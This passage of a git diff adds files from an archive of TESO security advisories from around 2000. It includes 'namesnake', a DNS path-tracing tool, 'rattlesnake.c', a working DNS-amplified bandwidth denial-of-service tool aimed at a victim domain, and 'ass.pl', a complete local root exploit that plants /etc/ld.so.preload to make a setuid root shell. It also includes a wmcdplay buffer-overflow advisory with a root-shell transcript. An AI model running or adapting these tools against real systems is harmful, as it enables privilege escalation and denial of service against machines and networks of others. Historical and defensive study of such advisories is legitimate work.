+        unsigned char *data, size_t data_len);
+
+
+#endif
+
diff --git a/advisories/teso-advisory-003/namesnake/src/namesnake.c b/advisories/teso-advisory-003/namesnake/src/namesnake.c
new file mode 100644
index 0000000..4db4607
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/namesnake.c
@@ -0,0 +1,271 @@
+/* namesnake - dns path discovery and measurement tool
+ *
+ * by scut of teso
+ *
+ * main file
+ */
+
+#define VERSION "0.0.2"
+#define AUTHORS "scut of teso"
+
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <time.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include "common.h"
+#include "network.h"
+#include "dns-build.h"
+#include "dns.h"
+#include "io-udp.h"
+
+
+typedef struct {
+        char *  ip;
+        int     count_resp;
+} ns;
+
+char *  ns_domain;
+
+int     usage (char *program);
+ns **   ns_hop_trace (char *ip_snake, char *domain_our);
+void    snakeprint (ns **list, int indent);
+int     snakequick (char *ip_snake, char *domain_our);
+int     snake (char *ip_snake, char *domain_our);
+
+char *          mode = "trace";
+char *          ip_local = NULL;
+udp_listen *    ul;
+
+
+int
+usage (char *program)
+{
+        printf ("usage: %s <ourdomain> <nameserver> [mode]\n\n"
+                "ourdomain   the domain that references to our current ip\n"
+                "nameserver  the startpoint for the nameserver chain to trace\n"
+                "mode        either \"quick\" or \"trace\"\n\n",
+                program);
+
+        exit (EXIT_FAILURE);
+}
+
+
+int
+main (int argc, char **argv)
+{
+        char *          ip_bind = NULL;
+
+        printf ("namesnake "VERSION" by "AUTHORS"\n\n");
+
+        if (argc < 3)
+                usage (argv[0]);
+
+        if (argc == 4 && strcmp (argv[3], "quick") == 0)
+                mode = argv[3];
+
+        ip_local = net_getlocalip ();
+        ul = udp_setup (ip_bind, 53);
+        if (ul == NULL) {
+                fprintf (stderr, "failed to bind to port 53, try specifying a local ip to bind to\n");
+                exit (EXIT_FAILURE);
+        }
+
+        printf ("[ns] listener bound to %s:53\n", (ip_bind == NULL) ? "*" : ip_bind);
+        printf ("[ns] tracing %s through the help of our domain %s\n", argv[2], argv[1]);
+        printf ("===============================================================================\n");
+
+        srandom (time (NULL));
+
+        if (strcmp (mode, "quick") == 0)
+                snakequick (argv[2], argv[1]);
+        else
+                snake (argv[2], argv[1]);
+
+        udp_listen_free (ul);
+        exit (EXIT_SUCCESS);
+}
+
+
+ns **
+ns_hop_trace (char *ip_snake, char *domain_our)
+{
+        ns **           ns_ret = NULL;
+        int             ns_entry_count = 0;
+        char *          ip;
+        int             i,m;
+        dns_pdata *     dp;
+        char *          querydomain;
+        int             count = 0;
+        udp_rcv *       ur;
+        struct timeval  tv_start;
+        struct timeval  tv;
+        int             bc = 0;
+
+        gettimeofday (&tv_start, NULL);
+
+        /* construct and send dns query
+         */
+        dp = dns_build_new ();
+        querydomain = dns_build_random (domain_our, 0);
+        dns_build_q (dp, querydomain, T_A, C_IN);
+        dns_packet_send (ip_local, ip_snake, m_random (1024, 65535), 53,
+                m_random (1, 65535), DF_RD, 1, 0, 0, 0, dp);
+        dns_build_destroy (dp);
+
+        while (bc == 0) {
+                struct timeval  tv_now;
+
+                gettimeofday (&tv_now, NULL);
+                tv.tv_sec = 140 - (tv_now.tv_sec - tv_start.tv_sec);
+                tv.tv_usec = 0;
+
+                ur = NULL;
+                if ((tv_now.tv_sec - tv_start.tv_sec) >= 0)
+                        ur = udp_receive (ul, &tv);
+
+                if (ur != NULL) {
+                        dns_handle ((dns_hdr *) ur->udp_data, ur->udp_data + sizeof (dns_hdr), ur->udp_len, 0);
+                        if (strcmp (querydomain, ns_domain) == 0) {
+                                count++;
+
+                                net_printipa ((struct in_addr *) & ur->addr_client.sin_addr, &ip);
+                                m = 0;
+                                for (i = 0 ; ns_ret != NULL && ns_ret[i] != NULL ; ++i) {
+                                        if (strcmp (ns_ret[i]->ip, ip) == 0) {
+                                                ns_ret[i]->count_resp += 1;
+                                                m = 1;
+                                        }
+                                }
+                                if (m == 0) {
+                                        ns_entry_count += 1;
+                                        ns_ret = xrealloc (ns_ret, (ns_entry_count + 1) * sizeof (ns *));
+                                        ns_ret[ns_entry_count] = NULL;
+                                        ns_ret[ns_entry_count - 1] = xcalloc (1, sizeof (ns));
+
+                                        ns_ret[ns_entry_count - 1]->ip = ip;
+                                        ns_ret[ns_entry_count - 1]->count_resp = 1;
+                                }
+                        } else {
+                                printf ("*!* received unrelated packet\n");
+                        }
+                        udp_rcv_free (ur);
+                        free (ns_domain);
+                }
+
+                if (ur == NULL)
+                        bc = 1;
+        }
+
+        free (querydomain);
+
+        return (ns_ret);
+
+}
+
+
+int
+snakequick (char *ip_snake, char *domain_our)
+{
+        char *          ip;
+        dns_pdata *     dp;
+        char *          querydomain;
+        int             count = 0;
+        udp_rcv *       ur;
+        struct timeval  tv_start;
+        struct timeval  tv;
+        int             bc = 0;
+
+        gettimeofday (&tv_start, NULL);
+
+        /* construct and send dns query
+         */
+        dp = dns_build_new ();
+        querydomain = dns_build_random (domain_our, 0);
+        dns_build_q (dp, querydomain, T_A, C_IN);
+        dns_packet_send (ip_local, ip_snake, m_random (1024, 65535), 53,
+                m_random (1, 65535), DF_RD, 1, 0, 0, 0, dp);
+        dns_build_destroy (dp);
+        printf ("asking for %s\n", querydomain);
+        free (querydomain);
+
+        while (bc == 0) {
+                struct timeval  tv_now;
+
+                gettimeofday (&tv_now, NULL);
+                tv.tv_sec = 90 - (tv_now.tv_sec - tv_start.tv_sec);
+                tv.tv_usec = 0;
+
+                ur = NULL;
+                if ((tv_now.tv_sec - tv_start.tv_sec) >= 0)
+                        ur = udp_receive (ul, &tv);
+
+                if (ur != NULL) {
+                        count++;
+                        net_printipa ((struct in_addr *) & ur->addr_client.sin_addr, &ip);
+                        printf ("%s\t== ", ip);
+                        dns_handle ((dns_hdr *) ur->udp_data, ur->udp_data + sizeof (dns_hdr), ur->udp_len, 1);
+                        udp_rcv_free (ur);
+                }
+
+                if (ur == NULL)
+                        bc = 1;
+        }
+
+        fprintf (stderr, "%s %d\n", ip_snake, count);
+
+        return (1);
+}
+
+
+void
+snakeprint (ns **list, int indent)
+{
+        int     walker,
+                indent_tmp;
+
+        if (list == NULL)
+                return;
+
+        for (walker = 0 ; list[walker] != NULL ; ++walker) {
+                for (indent_tmp = indent ; indent_tmp > 0 ; --indent_tmp) {
+                        printf ("\t");
+                }
+                printf ("%3d %s\n", list[walker]->count_resp, list[walker]->ip);
+        }
+
+        return;
+}
+
+
+int
+snake (char *ip_snake, char *domain_our)
+{
+        ns ***          pathway;
+        ns **           base;
+        int             walker;
+        int             ns_count;
+
+
+        base = ns_hop_trace (ip_snake, domain_our);
+        if (base == NULL || base[0] == NULL)
+                return (0);
+
+        printf ("%s\n", ip_snake);
+        snakeprint (base, 1);
+        for (ns_count = 0 ; base[ns_count] != NULL ; ++ns_count)
+                ;
+        printf ("======== tracing pathway of %d servers ========\n", ns_count);
+
+        ns_count += 1;
+        pathway = xcalloc (1, sizeof (ns **) * (ns_count));
+        for (walker = 0 ; base[walker] != NULL ; ++walker) {
+                printf ("=== %s\n", base[walker]->ip);
+                pathway[walker] = ns_hop_trace (base[walker]->ip, domain_our);
+                snakeprint (pathway[walker], 1);
+        }
+
+        return (1);
+}
+
+
diff --git a/advisories/teso-advisory-003/namesnake/src/network.c b/advisories/teso-advisory-003/namesnake/src/network.c
new file mode 100644
index 0000000..4d56546
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/network.c
@@ -0,0 +1,362 @@
+/* namesnake
+ *
+ * network primitives
+ *
+ * by scut
+ *
+ * nearly all of this code wouldn't have been possible without w. richard stevens
+ * excellent network coding book. if you are interested in network coding,
+ * there is no way around it.
+ */
+
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/time.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <net/if.h>
+#include <netinet/in.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <stdarg.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "common.h"
+#include "network.h"
+
+
+int
+net_connect (struct sockaddr_in *cs, char *server, unsigned short int port,
+        int sec)
+{
+        int                     n, len, error, flags;
+        int                     fd;
+        struct timeval          tv;
+        struct sockaddr_in      tmp_cs;
+        fd_set                  rset, wset;
+
+
+        if (cs == NULL)
+                cs = &tmp_cs;
+
+        /* first allocate a socket */
+        cs->sin_family = AF_INET;
+        cs->sin_port = htons (port);
+        fd = socket (cs->sin_family, SOCK_STREAM, 0);
+        if (fd == -1)
+                return (-1);
+
+        if (!(cs->sin_addr.s_addr = net_resolve (server))) {
+                close (fd);
+
+                return (-1);
+        }
+
+        flags = fcntl (fd, F_GETFL, 0);
+        if (flags == -1) {
+                close (fd);
+
+                return (-1);
+        }
+
+        n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1) {
+                close (fd);
+
+                return (-1);
+        }
+
+        error = 0;
+
+        n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
+        if (n < 0) {
+                if (errno != EINPROGRESS) {
+                        close (fd);
+
+                        return (-1);
+                }
+        }
+        if (n == 0)
+                goto done;
+
+        FD_ZERO (&rset);
+        FD_ZERO (&wset);
+        FD_SET (fd, &rset);
+        FD_SET (fd, &wset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+
+        n = select (fd + 1, &rset, &wset, NULL, &tv);
+        if (n == 0) {
+                close (fd);
+                errno = ETIMEDOUT;
+
+                return (-1);
+        }
+        if (n == -1)
+                return (-1);
+
+        if (FD_ISSET (fd, &rset) || FD_ISSET (fd, &wset)) {
+                if (FD_ISSET (fd, &rset) && FD_ISSET (fd, &wset)) {
+                        len = sizeof (error);
+                        if (getsockopt (fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
+                                errno = ETIMEDOUT;
+                                return (-1);
+                        }
+                        if (error == 0) {
+                                goto done;
+                        } else {
+                                errno = error;
+                                return (-1);
+                        }
+                }
+        } else
+                return (-1);
+
+done:
+        n = fcntl (fd, F_SETFL, flags);
+        if (n == -1)
+                return (-1);
+        return (fd);
+}
+
+
+int
+net_accept (int s, struct sockaddr_in *cs, int maxsec)
+{
+        int             flags, n;
+        fd_set          ac_s;
+        int             len;
+        struct timeval  tval;
+
+        flags = fcntl (s, F_GETFL, 0);
+        if (flags == -1)
+                return (-1);
+        n = fcntl (s, F_SETFL, flags | O_NONBLOCK);
+        if (flags == -1)
+                return (-1);
+
+        FD_ZERO (&ac_s);
+        FD_SET (s, &ac_s);
+        tval.tv_sec = maxsec;
+        tval.tv_usec = 0;
+
+        n = select (s + 1, &ac_s, NULL, NULL, maxsec ? &tval : NULL);
+        if (n == 0)
+                return (0);
+
+        if (FD_ISSET (s, &ac_s)) {
+                len = sizeof (struct sockaddr_in);
+                n = accept (s, (struct sockaddr *) cs, &len);
+                if (n == -1) {
+                        switch (errno) {
+                        case EWOULDBLOCK:
+                        case ECONNABORTED:
+                        case EPROTO:
+                        case EINTR:     if (fcntl (s, F_SETFL, flags) == -1)
+                                                return (-1);
+                                        return (0);
+                        default:        return (-1);
+                        }
+                }
+                if (fcntl (s, F_SETFL, flags) == -1)
+                        return (-1);
+                return (n);
+        }
+        if (fcntl (s, F_SETFL, flags) == -1)
+                return (-1);
+
+        return (0);
+}
+
+
+void
+net_boundfree (bound *bf)
+{
+        close (bf->bs);
+        free (bf);
+
+        return;
+}
+
+
+bound *
+net_bind (char *ip, unsigned short int port)
+{
+        bound                   *b;
+        int                     br, gsnr, lr;
+        int                     len, reusetmp;
+        struct sockaddr_in      *sap;
+
+        if (port >= 65536)
+                return (NULL);
+
+        b = xcalloc (1, sizeof (bound));
+        b->bs = socket (AF_INET, SOCK_STREAM, 0);
+        if (b->bs == -1)
+                goto berror;
+
+        reusetmp = 1;
+#ifdef SO_REUSEPORT
+        if (setsockopt (b->bs, SOL_SOCKET, SO_REUSEPORT, &reusetmp, sizeof (reusetmp)) == -1)
+                goto berror;
+#else
+        if (setsockopt (b->bs, SOL_SOCKET, SO_REUSEADDR, &reusetmp, sizeof (reusetmp)) == -1)
+                goto berror;
+#endif
+
+        sap = (struct sockaddr_in *) &b->bsa;
+        sap->sin_family = AF_INET;
+        sap->sin_port = htons (port);           /* 0 = ephemeral */
+
+        if (ip != NULL) {
+                if (strcmp (ip, "*") == 0) {
+                        sap->sin_addr.s_addr = htonl (INADDR_ANY);
+                } else {
+                        if (!(sap->sin_addr.s_addr = net_resolve (ip))) {
+                                goto berror;
+                        }
+                }
+        } else {
+                sap->sin_addr.s_addr = htonl (INADDR_ANY);
+        }
+
+        br = bind (b->bs, (struct sockaddr *) &b->bsa, sizeof (struct sockaddr));
+        if (br == -1)
+                goto berror;
+
+        len = sizeof (struct sockaddr);
+        gsnr = getsockname (b->bs, (struct sockaddr *) &b->bsa, &len);
+        b->port = ntohs (sap->sin_port);
+        if (gsnr == -1)
+                goto berror;
+
+        lr = listen (b->bs, 16);
+        if (lr == -1) {
+                goto berror;
+        }
+        return (b);
+
+berror:
+        free (b);
+
+        return(NULL);
+}
+
+
+int
+net_parseip (char *inp, char **ip, unsigned short int *port)
+{
+        int     n;
+
+        if (inp == NULL)
+                return (0);
+        if (strchr (inp, ':') == NULL)
+                return (0);
+
+        *ip = calloc (1, 256);
+        if (*ip == NULL)
+                return (0);
+
+        n = sscanf (inp, "%[^:]:%hu", *ip, port);
+        if (n != 2)
+                return (0);
+
+        *ip = realloc (*ip, strlen (*ip) + 1);
+        if (*ip == NULL || (*port < 1 || *port > 65535))
+                return (0);
+
+        return (1);
+}
+
+
+char *
+net_getlocalip (void)
+{
+        struct sockaddr_in      pf;
+        char                    name[255];
+
+        memset (name, '\0', sizeof (name));
+
+        if (gethostname (name, sizeof (name) - 1) == -1) {
+                return (NULL);
+        }
+
+        pf.sin_addr.s_addr = net_resolve (name);
+
+        return (strdup (inet_ntoa (pf.sin_addr)));;
+}
+
+
+/* partly based on resolv routine from ?
+ */
+
+unsigned long int
+net_resolve (char *host)
+{
+        long            i;
+        struct hostent  *he;
+
+        if (host == NULL)
+                return (htonl (INADDR_ANY));
+
+        if (strcmp (host, "*") == 0)
+                return (htonl (INADDR_ANY));
+
+        i = inet_addr (host);
+        if (i == -1) {
+                he = gethostbyname (host);
+                if (he == NULL) {
+                        return (0);
+                } else {
+                        return (*(unsigned long *) he->h_addr);
+                }
+        }
+        return (i);
+}
+
+
+int
+net_printipr (struct in_addr *ia, char *str, size_t len)
+{
+        unsigned char   *ipp;
+
+        ipp = (unsigned char *) &ia->s_addr;
+        snprintf (str, len - 1, "%d.%d.%d.%d", ipp[3], ipp[2], ipp[1], ipp[0]);
+
+        return (0);
+}
+
+
+int
+net_printip (struct in_addr *ia, char *str, size_t len)
+{
+        unsigned char   *ipp;
+
+        ipp = (unsigned char *) &ia->s_addr;
+        snprintf (str, len - 1, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
+
+        return (0);
+}
+
+
+int
+net_printipa (struct in_addr *ia, char **str)
+{
+        unsigned char   *ipp;
+
+        ipp = (unsigned char *) &ia->s_addr;
+        *str = calloc (1, 256);
+        if (*str == NULL)
+                return (1);
+
+        snprintf (*str, 255, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
+        *str = realloc (*str, strlen (*str) + 1);
+
+        return ((*str == NULL) ? 1 : 0);
+}
+
+
diff --git a/advisories/teso-advisory-003/namesnake/src/network.h b/advisories/teso-advisory-003/namesnake/src/network.h
new file mode 100644
index 0000000..97054f4
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/network.h
@@ -0,0 +1,135 @@
+/* namesnake
+ *
+ * by scut
+ */
+
+#ifndef _FNX_NETWORK_H
+#define _FNX_NETWORK_H
+
+#include <sys/socket.h>
+#include <net/if.h>
+#include <netinet/in.h>
+#include <stdio.h>
+
+
+typedef struct bound {
+        int                     bs;     /* bound socket */
+        unsigned short          port;   /* port we bound to */
+        struct sockaddr         bsa;    /* bs_in */
+} bound;
+
+
+/* net_connect
+ *
+ * connect to the given `server' and `port' with a max timeout of `sec'.
+ * initialize the sockaddr_in struct `cs' correctly (ipv4), accept any
+ * ip "123.123.123.123" or hostname "localhost", "www.yahoo.de" as hostname.
+ * create a new socket and return either -1 if failed or
+ * the connected socket if connection has been established within the
+ * timeout limit.
+ *
+ * the routine is still IPv4 biased :-/
+ *
+ * return -1 on failure
+ * return socket if success
+ */
+
+int     net_connect (struct sockaddr_in *cs, char *server, unsigned short int port,
+        int sec);
+
+
+/* net_accept
+ *
+ * accept a connection from socket s, and stores the connection
+ * into cs.
+ * wait a maximum amount of maxsec seconds for connections
+ * maxsec can also be zero (infinite wait, until connection)
+ *
+ * return 0 if no connection has been made within maxsec seconds
+ * return -1 if an error appears
+ * return the socket number if a connection has been made
+ */
+
+int     net_accept (int s, struct sockaddr_in *cs, int maxsec);
+
+
+/* net_bind
+ *
+ * bind a socket to an ip:port on the local machine,
+ * `ip' can be either NULL (bind to all IP's on the host), or a pointer
+ * to a virtual host name, or a real IP, or "*" for any.
+ * `port' can be either 0 (ephemeral port), or any free port.
+ *
+ * return NULL on failure
+ * return pointer to bound structure on success
+ */
+
+bound   *net_bind (char *ip, unsigned short int port);
+
+
+/* net_boundfree
+ *
+ * free the bound structure pointed to by `bf'
+ *
+ * return in any case
+ */
+
+void    net_boundfree (bound *bf);
+
+
+/* net_parseip
+ *
+ * read an ip in the format "1.1.1.1:299" or "blabla:481" into
+ * the char pointer *ip and into the port *port
+ *
+ * return 0 on failure
+ * return 1 on success
+ */
+
+int     net_parseip (char *inp, char **ip, unsigned short int *port);
+
+
+/* net_getlocalip
+ *
+ * give back the main IP of the local machine
+ *
+ * return the local IP address as string on success
+ * return NULL on failure
+ */
+
+char    *net_getlocalip (void);
+
+
+/* net_resolve
+ *
+ * resolve a hostname pointed to by `host' into a s_addr return value
+ *
+ * return the correct formatted `s_addr' for this host on success
+ * return 0 on failure
+ */
+
+unsigned long int       net_resolve (char *host);
+
+
+/* net_printip
+ *
+ * print an IP address stored in the struct in_addr pointed to by `ia' to a
+ * string `str' with a maximum length of `len'.
+ *
+ * return 0 on success
+ *Üreturn 1 on failure
+ *
+ * net_printipa behaves the same way, except it allocates memory and let
+ * `*str' point to the string
+ *
+ * net_printipr behaves like net_printip, except the IP is printed in
+ * reverse quad dotted order (dns labels)
+ */
+
+int     net_printip (struct in_addr *ia, char *str, size_t len);
+int     net_printipa (struct in_addr *ia, char **str);
+int     net_printipr (struct in_addr *ia, char *str, size_t len);
+
+
+#endif
+
diff --git a/advisories/teso-advisory-003/namesnake/src/rattlesnake.c b/advisories/teso-advisory-003/namesnake/src/rattlesnake.c
new file mode 100644
index 0000000..944b74c
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/rattlesnake.c
@@ -0,0 +1,157 @@
+/* rattlesnake - bandwidth denial of service attack
+ *
+ * by scut of teso
+ * (discovered by me too, see teso-i0006.txt)
+ *
+ * main file
+ */
+
+#define VERSION "0.0.2"
+#define AUTHORS "scut of teso"
+
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <time.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include "common.h"
+#include "network.h"
+#include "dns-build.h"
+#include "dns.h"
+#include "io-udp.h"
+
+
+int     usage (char *program);
+int     rattle (char *domain_victim);
+
+char *          ns_domain;
+char *          ip_local = NULL;
+int             ns_count,
+                ns_walker = 0;
+char **         ns_list = NULL;
+int             speed;
+int             sd_len = 340;
+
+
+int
+usage (char *program)
+{
+        printf ("usage: %s <ns-list> <victim-domain> <bandwidth> [sdlen]\n\n"
+                "ns-list        file with a nameserver list\n"
+                "victim-domain  the domain that references to our victim ip\n"
+                "bandwidth      bandwidth in kbps that we should utilize, the higher the lamer\n"
+                "sdlen          subdomain length as in <sdlen>.<victim-domain>\n"
+                "               default is 340 (1-400 makes sense)\n\n",
+                program);
+
+        exit (EXIT_FAILURE);
+}
+
+
+int
+main (int argc, char **argv)
+{
+        printf ("rattlesnake "VERSION" by "AUTHORS"\n\n");
+
+        if (argc < 4 || argc > 5)
+                usage (argv[0]);
+        if (argc == 5 && sscanf (argv[4], "%d", &sd_len) != 1)
+                usage (argv[0]);
+
+
+        ip_local = net_getlocalip ();
+
+        ns_list = file_read (argv[1]);
+        if (ns_list == NULL) {
+                fprintf (stderr, "failed to open nameserver list file %s\n", argv[1]);
+                exit (EXIT_FAILURE);
+        }
+        for (ns_count = 0 ; ns_list[ns_count] != NULL ; ++ns_count)
+                ;
+        if (ns_count == 0) {
+                fprintf (stderr, "come on boy, you must at least supply one nameserver\n");
+                exit (EXIT_FAILURE);
+        }
+
+        if (sscanf (argv[3], "%d", &speed) != 1)
+                usage (argv[0]);
+
+        printf ("[ns] querying below %s through the help of %d nameservers at %d kbps\n",
+                argv[2], ns_count, speed);
+        printf ("===============================================================================\n");
+
+        srandom (time (NULL));
+
+        rattle (argv[2]);
+
+        exit (EXIT_SUCCESS);
+}
+
+
+int
+rattle (char *domain_victim)
+{
+        dns_pdata *             dp;
+        char *                  querydomain;
+        char *                  querydomain2;
+        struct timeval          tv_start;
+        unsigned long long int  size_send = 0;
+
+        gettimeofday (&tv_start, NULL);
+
+        while (1) {
+                unsigned long long int  sleeptime;
+                struct timeval          tv_now;
+
+                /* construct query domain, slow
+                 */
+                dp = dns_build_new ();
+                querydomain = dns_build_random (domain_victim, 32);
+                while (strlen (querydomain) < sd_len) {
+                        querydomain2 = dns_build_random (querydomain, 32);
+                        free (querydomain);
+                        querydomain = querydomain2;
+                }
+
+                /* now build DNS packet
+                 */
+                dns_build_q (dp, querydomain, T_A, C_IN);
+                dns_packet_send (ip_local, ns_list[ns_walker], m_random (1024, 65535), 53,
+                        m_random (1, 65535), DF_RD, 1, 0, 0, 0, dp);
+                dns_build_destroy (dp);
+
+                size_send += strlen (querydomain) + sizeof (ip_hdr) +
+                        sizeof (udp_hdr) + sizeof (dns_hdr);
+                free (querydomain);
+
+                /* eye candy
+                 */
+                printf (".");
+                fflush (stdout);
+
+                /* next server
+                 */
+                ns_walker++;
+                ns_walker %= ns_count;
+
+                /* if you get fucked up here it's because you've packeted too
+                 * much, so bugger off and don't be a wussy
+                 */
+                do {
+                        /* some people might think now that a sleeptime approach
+                         * is better here, but in this case a mixture of polling
+                         * and time calculation is better for equal spreading of
+                         * the packets being send
+                         */
+                        usleep (5000);          /* don't poll too fast */
+                        gettimeofday (&tv_now, NULL);
+                        sleeptime = tv_now.tv_sec - tv_start.tv_sec;
+                        sleeptime *= 1000000;
+                        sleeptime += ((tv_now.tv_usec + 1000000) - tv_start.tv_usec) % 1000000;
+                } while (((sleeptime * speed) / 7812) < size_send);
+        }
+
+        return (1);
+}
+
+
diff --git a/advisories/teso-advisory-004/advisory-004.txt b/advisories/teso-advisory-004/advisory-004.txt
new file mode 100644
index 0000000..248adea
--- /dev/null
+++ b/advisories/teso-advisory-004/advisory-004.txt
diff --git a/advisories/teso-advisory-004/ass.pl b/advisories/teso-advisory-004/ass.pl
new file mode 100755
index 0000000..dbb1fd4
--- /dev/null
+++ b/advisories/teso-advisory-004/ass.pl
@@ -0,0 +1,61 @@
+#!/usr/bin/perl
+
+# Halloween 4 local root-exploit, other distros are maybe
+# affected as well. (atsadc program)
+# (C) 2000 C-skills development, S. Krahmer under the GPL
+# http://www.cs.uni-potsdam.de/homepages/students/linuxer
+
+# Exploit will create /etc/ld.so.preload, so it should NOT exist
+# already. THIS FILE WILL BE LOST!
+
+# ! USE IT AT YOUR OWN RISK !
+# For educational purposes only.
+
+print "Creating hijack-lib ...\n";
+open O, ">/tmp/boom.c" or die "open(boom.c..)";
+print O<<_EOF_;
+#include <sys/types.h>
+
+int time(void *v)
+{
+        chown("/tmp/boomsh", 0, 0);
+        chmod("/tmp/boomsh", 06755);
+        unlink("/etc/ld.so.preload");
+        exit(1);
+}
+_EOF_
+close O;
+
+print "Compiling hijack-lib ...\n";
+$foo = `cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
+$foo = `cc -shared /tmp/boom.o -o /tmp/boom.so`;
+
+open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
+print O<<_EOF2_;
+#include <stdio.h>
+int main() 
+{
+    char *a[] = {"/bin/sh", 0};
+    setuid(0); setregid(0, 0);
+    execve(a[0], a, 0);
+    return 0;
+}
+_EOF2_
+close O;
+
+print "Compile shell ...\n";
+$foo = `cc /tmp/boomsh.c -o /tmp/boomsh`;
+
+umask 0;
+
+print "Invoking vulnerable program (atsadc)...\n";
+$foo = `atsadc 2 1 /etc/ld.so.preload`;
+open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
+print O "/tmp/boom.so";
+close O;
+$foo = `/usr/bin/passwd`;
+
+# let it look like if we have sth. to do. :)
+sleep 3;
+print "Welcome. But as always: BEHAVE!\n";
+system("/tmp/boomsh");
diff --git a/advisories/teso-advisory-005/advisory-005.txt b/advisories/teso-advisory-005/advisory-005.txt
new file mode 100644
index 0000000..327cb19
--- /dev/null
+++ b/advisories/teso-advisory-005/advisory-005.txt
@@ -0,0 +1,166 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+
+- ------
+
+TESO Security Advisory
+03/09/2000
+
+wmcdplay local root compromise
+
+
+Summary
+===================
+
+    A vulnerability within the wmcdplay CD playing application for the
+    WindowMaker desktop has been discovered. It allows local root compromise
+    through arbitrary code execution.
+
+
+Systems Affected
+===================
+
+    Any system which has wmcdplay installed as setuid root. Though on most
+    popular system distributions wmcdplay is not installed by default, the
+    optional installation of it is always setuid root, hence affected by the
+    problem.
+
+    Please note that wmcdplay doesn't require WindowMaker as its desktop,
+    so even if you haven't installed WindowMaker you may be vulnerable.
+
+    Among the vulnerable distributions (if the package is installed) are the
+    following systems:
+
+      Debian/GNU Linux 2.1, wmcdplay 1.0beta1-2
+      Halloween Linux Version 4
+
+
+Tests
+===================
+
+
+    liane:[bletchley]> id -a
+    uid=501(bletchley) gid=501(bletchley) groups=501(bletchley)
+    liane:[bletchley]> cd wmhack/
+    liane:[wmhack]> uname -a
+    Linux liane.c-skills.de 2.2.13-13 #21 Thu Mar 2 10:36:13 WET 2000 i686 unknown
+    liane:[wmhack]> stat `which wmcdplay`
+      File: "/usr/X11R6/bin/wmcdplay"
+      Size: 38372        Filetype: Regular File
+      Mode: (4755/-rwsr-xr-x)         Uid: (    0/    root)  Gid: (    0/    root)
+    Device:  3,1   Inode: 213954    Links: 1
+    Access: Sat Mar  4 14:21:43 2000(00004.20:34:20)
+    Modify: Thu Nov 11 09:59:00 1999(00119.00:57:03)
+    Change: Fri Mar  3 15:31:42 2000(00005.19:24:21)
+    liane:[wmhack]> cc wmexp.c
+    liane:[wmhack]> ./a.out
+    You can also add an offset to the command-line. 40 worked for me on the console.
+    Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer
+    Respect other users privacy!
+    wmcdplay : Tried to find artwork file, but failed.
+    Segmentation fault
+    liane:[wmhack]> ./a.out 40
+    Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer
+    Respect other users privacy!
+    wmcdplay : Tried to find artwork file, but failed.
+    Illegal instruction
+    liane:[wmhack]> ./a.out 140
+    Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer
+    Respect other users privacy!
+    wmcdplay : Tried to find artwork file, but failed.
+    sh-2.03# id -a
+    uid=0(root) gid=501(bletchley) groups=501(bletchley)
+    sh-2.03#
+
+Impact
+===================
+
+    Through exploitation of the buffer overflow within wmcdplay a local user
+    can elevate his privileges to the superuser level. Once this is archived
+    the attacker has complete access to the system, allowing compromitation
+    of all data stored on it.
+
+
+Explanation
+===================
+
+    Due to inaccurate bounds-checking a sprintf() call with commandline
+    arguments, it can be used to overflow a stack-located buffer.
+    By setting proper values and avoiding zero-bytes an attacker can execute
+    arbitrary code.     
+
+
+Solution
+===================
+
+    The author and the distributor has been informed before. A patch is already
+    available. Short-timed just remove the suid-bit; it is not necessary.
+                
+
+Acknowledgments
+================
+
+    The bug-discovery and the demonstration programs are due to S. Krahmer [2].
+    The shell-code is due to Stealth.
+
+    This advisory has been written by scut and S. Krahmer.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to tesopub@coredump.cx.
+    Our web page is at http://teso.scene.at/
+    
+    C-Skills developers may be reached through [2].
+
+
+References
+===================
+
+    [1] TESO
+        http://teso.scene.at/
+
+    [2] S. Krahmer, C-Skills
+        http://www.cs.uni-potsdam.de/homepages/students/linuxer/
+
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    link [1] and [2].
+
+
+Exploit
+===================
+
+    We've created a working demonstration program to exploit the vulnerability.
+
+    The exploit is available from
+
+       http://teso.scene.at/
+
+    and
+        
+       http://www.cs.uni-potsdam.de/homepages/students/linuxer
+
+- ------
+
+
+
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.0.0 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+iD8DBQE4yQ4QcZZ+BjKdwjcRAobJAJwO+vEtw5on/9obko1ozI7DywhbSwCgnG18
+7aAhRDSSJr15f06W1Ei4b64=
+=HrTR
+-----END PGP SIGNATURE-----
diff --git a/advisories/teso-advisory-005/wmexp.c b/advisories/teso-advisory-005/wmexp.c
new file mode 100644
index 0000000..88a3398
--- /dev/null
+++ b/advisories/teso-advisory-005/wmexp.c
@@ -0,0 +1,65 @@
